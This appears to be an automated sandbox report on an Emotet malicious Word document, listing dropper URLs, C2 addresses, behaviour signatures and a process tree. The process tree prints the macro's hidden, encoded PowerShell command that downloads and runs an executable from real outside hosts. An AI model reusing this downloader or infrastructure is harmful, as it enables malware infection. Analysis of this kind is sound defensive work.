Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    151s
  • resource
    win7v191014
  • submitted
    09-12-2019 21:55

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_bb7395a685cc5b362335f533fc6f058e.26.doc

  • Sample

    191209-n2we2ptm8j

  • SHA256

    f93960eeb1c885d2b561ecaf9b4db5009bbf79a9e9693c7f279a46c3f5ad42df

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://mgn.becksworld.org/cgi-bin/qou-ctdaa-783206946/
exe.dropper

http://glojef.hwtnetworks.com/cgi-bin/kewbuqy-7d9-286/
exe.dropper

http://psikologimarketing.com/eikhx/QBMWeUC/
exe.dropper

http://demo.woo-wa.com/wp-content/crDSizyuW/
exe.dropper

http://www.icbasiglio.gov.it/wpgo/w7mfnu8-wk673a-9668696/

Extracted

Family

emotet

C2

24.27.122.202:80

67.171.182.231:80

190.171.135.235:80

103.9.145.19:8080

46.105.128.215:8080

172.105.213.30:80

69.30.205.162:7080

115.179.91.58:80

181.44.166.242:80

78.46.87.133:8080

81.213.145.45:443

83.156.88.159:80

210.111.160.220:80

195.191.107.67:80

192.241.220.183:8080

1.32.54.12:8080

192.161.190.171:8080

190.189.79.73:80

122.11.164.183:80

41.77.74.214:443
rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Drops file in System32 directory 6 IoCs
  • Modifies registry class 136 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Suspicious use of FindShellTrayWindow 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_bb7395a685cc5b362335f533fc6f058e.26.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Drops file in System32 directory
    • Suspicious use of FindShellTrayWindow
    PID:1348
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABYAGwAbwBlAGEAYQB3AGkAdwA9ACcASwB3AGMAZgBoAHkAegB0AG0AZgAnADsAJABSAGsAYwB6AGMAdQBiAGkAcgBqACAAPQAgACcANQA2ADUAJwA7ACQATwBxAHoAeABjAGsAbwB4AGwAPQAnAFAAYgBxAHQAZABiAHEAcQBiAGEAJwA7ACQARABsAGcAYQBwAHUAdABlAHkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFIAawBjAHoAYwB1AGIAaQByAGoAKwAnAC4AZQB4AGUAJwA7ACQAQQBvAHQAagBzAHEAZwBiAD0AJwBJAHAAagBiAHoAZgBtAGIAbgB6ACcAOwAkAEMAbQB6AGQAZgB2AHAAZABvAD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcARQBCAGMATABpAEUATgBUADsAJABXAHIAbgBoAGkAZwB4AHQAcwB5AGsAPQAnAGgAdAB0AHAAOgAvAC8AbQBnAG4ALgBiAGUAYwBrAHMAdwBvAHIAbABkAC4AbwByAGcALwBjAGcAaQAtAGIAaQBuAC8AcQBvAHUALQBjAHQAZABhAGEALQA3ADgAMwAyADAANgA5ADQANgAvACoAaAB0AHQAcAA6AC8ALwBnAGwAbwBqAGUAZgAuAGgAdwB0AG4AZQB0AHcAbwByAGsAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGsAZQB3AGIAdQBxAHkALQA3AGQAOQAtADIAOAA2AC8AKgBoAHQAdABwADoALwAvAHAAcwBpAGsAbwBsAG8AZwBpAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwBlAGkAawBoAHgALwBRAEIATQBXAGUAVQBDAC8AKgBoAHQAdABwADoALwAvAGQAZQBtAG8ALgB3AG8AbwAtAHcAYQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGMAcgBEAFMAaQB6AHkAdQBXAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AaQBjAGIAYQBzAGkAZwBsAGkAbwAuAGcAbwB2AC4AaQB0AC8AdwBwAGcAbwAvAHcANwBtAGYAbgB1ADgALQB3AGsANgA3ADMAYQAtADkANgA2ADgANgA5ADYALwAnAC4AIgBzAFAAbABgAGkAVAAiACgAJwAqACcAKQA7ACQAUABnAGkAZwBwAGsAbwB5AGEAZwB4AG4APQAnAEoAYQB3AGcAZgBjAHoAZgB0AGEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMAcQBxAHAAYwByAGUAdAAgAGkAbgAgACQAVwByAG4AaABpAGcAeAB0AHMAeQBrACkAewB0AHIAeQB7ACQAQwBtAHoAZABmAHYAcABkAG8ALgAiAEQAYABPAHcAYABOAGAATABPAGEARABGAGkAbABlACIAKAAkAFMAcQBxAHAAYwByAGUAdAAsACAAJABEAGwAZwBhAHAAdQB0AGUAeQApADsAJABCAGwAZAB6AG0AcwBsAGgAPQAnAEIAbQBhAHYAbgBrAGoAYgBzAHcAYgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEQAbABnAGEAcAB1AHQAZQB5ACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADIANgA5ADUAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGEAYABSAFQAIgAoACQARABsAGcAYQBwAHUAdABlAHkAKQA7ACQARgBnAHUAcAB0AGsAbQBoAHcAbgA9ACcAVQBhAHQAZQBjAHIAagB3ACcAOwBiAHIAZQBhAGsAOwAkAEcAagBwAG8AdgByAGgAbgBhAGwAPQAnAFQAZwB5AHYAbgBvAGEAdABwAG4AbQBqACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAbwB0AGsAZwB6AGwAdgB6AGsAPQAnAE8AdgBhAGkAbQB4AG8AYwBoACcA
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1712
    • C:\Users\Admin\565.exe
      "C:\Users\Admin\565.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1056
      • C:\Users\Admin\565.exe
        --1fe51a92
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        PID:1300
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-2116313526-128243546112969753881292014644-38543870820470481086982838491633180130"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1640
  • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
    1⤵
      PID:1824
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k WerSvcGroup
      1⤵
        PID:316
      • C:\Windows\SysWOW64\wowfooter.exe
        "C:\Windows\SysWOW64\wowfooter.exe"
        1⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1856
        • C:\Windows\SysWOW64\wowfooter.exe
          --efce110
          2⤵
          • Suspicious use of SetWindowsHookEx
          • Suspicious behavior: EnumeratesProcesses
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          • Drops file in System32 directory
          PID:1828

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\565.exe
        Download Submit

      • C:\Users\Admin\565.exe
        Download Submit

      • C:\Users\Admin\565.exe
        Download Submit

      • C:\Windows\SysWOW64\wowfooter.exe
        Download Submit

      • C:\Windows\SysWOW64\wowfooter.exe
        Download Submit

      • memory/1056-8-0x0000000000280000-0x0000000000297000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1300-11-0x0000000000400000-0x0000000000455000-memory.dmp

        Filesize

        340KB

        Download

      • memory/1300-10-0x0000000000360000-0x0000000000377000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1348-5-0x0000000006390000-0x0000000006590000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1348-0-0x0000000006390000-0x0000000006394000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1348-4-0x0000000006390000-0x0000000006590000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1348-3-0x0000000008EE0000-0x0000000008EE4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1348-1-0x0000000005B1F000-0x0000000005BC8000-memory.dmp

        Filesize

        676KB

        Download

      • memory/1828-15-0x0000000000320000-0x0000000000337000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1828-16-0x0000000000400000-0x0000000000455000-memory.dmp

        Filesize

        340KB

        Download

      • memory/1856-13-0x0000000000270000-0x0000000000287000-memory.dmp

        Filesize

        92KB

        Download